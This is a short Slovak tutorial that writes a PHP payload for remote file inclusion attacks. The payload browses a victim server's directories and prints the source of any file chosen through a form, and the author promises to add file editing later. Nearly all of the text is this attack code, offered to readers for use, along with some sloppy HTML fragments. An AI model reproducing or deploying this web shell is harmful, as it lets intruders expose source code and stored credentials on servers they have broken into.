RFI exploit

Dnes si napíšeme malý RFI exploitik ktorý využíva nezabezpečený include súborov.

Takže čo by mal taký RFI exploit robiť?V prvomrade zobrazovať zložky a súbory umiestené na servery.Ako to urobiť?Takto:

 

<h4 align=\"center\"><font face=\"Kristen ITC\" color=\"#000000\">Php remote exploit</font></h4> <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr> <td width=\"50%\" valign=\"top\"> <div align=\"left\"> <table cellpadding=\"3\" cellspacing=\"0\" border=\"0\"> <tr> <td width=\"36%\"> <b>Názov</b> </td> <td width=\"50%\">                 <b>Veľkosť</b> </td> </div></td></tr> <tr bgcolor=\"#005FA4\"> <td height=\"3\"></td> <td></td> <td></td></tr><br />";

 

Ešte sme vytvorily len tabuĺku v ktorej sa nám to celé bude zobrazovať.Teraz vytvoríme samotný skript:

 

<?PHP if(Empty($adresar)): $adresar = "."; endif; $handle = opendir($adresar); while($entry = readdir($handle)) { if(is_file("$adresar/$entry")): echo "<tr><td><a href=\"$adresar/$entry\">$entry</a></td><td><div align=\"center\">".filesize("$adresar/$entry")."</div></td><td>"; else: echo "<tr><td><b><a href=\"EXLOIT.php?adresar=$adresar/$entry\" target=\"_blank\">$entry</a></b></td><td><div align=\"center\">-</div></td><td></td></tr>"; endif; } ?>

 

Skript preľadne vypíše súbory a zložky formou odkazov.Čo dalej?Predsa vypísať zdrojáky!Bez toho by to nebol poriadny epxloit takže horsa na to:

 

<form action="EXLOIT.php" method="post"> <input type="hidden" name="adresar" value="<?php echo $adresar?>" /> <select name="nazov" class="select"> <option value="false" SELECTED>Vyber súbor</option> <?php $handle = opendir($adresar); while($entry = readdir($handle)) { if(is_file("$adresar/$entry")) echo "<option value=\"$entry\">$entry</option>"; } ?> </select>  <select name="operacia" class="select"> <option value="false" SELECTED>Operácia</option> <option value="edit">editovať</option> <option value="source">zobraziť source</option> </select>  <button type="submit" class="button">Vykonať</button> </form> </p> <?php if($_POST['operacia']!="false" && $_POST['nazov']!="false"){ $kde = $_POST['adresar']."/".$_POST['nazov']; if($_POST['operacia']=="source"){ show_source($kde); }} ?>

 

Celý tento kód vytvorí dve select ponuky jednu s vyberom súboru druhú z výberom akcie ,kedže v budúcnosti ešte exploit rozšírime, a po zvolení zobraziť source sa vypíše zdroják súboru.Takže to je na dnes všetko nech vám exploitík slúži.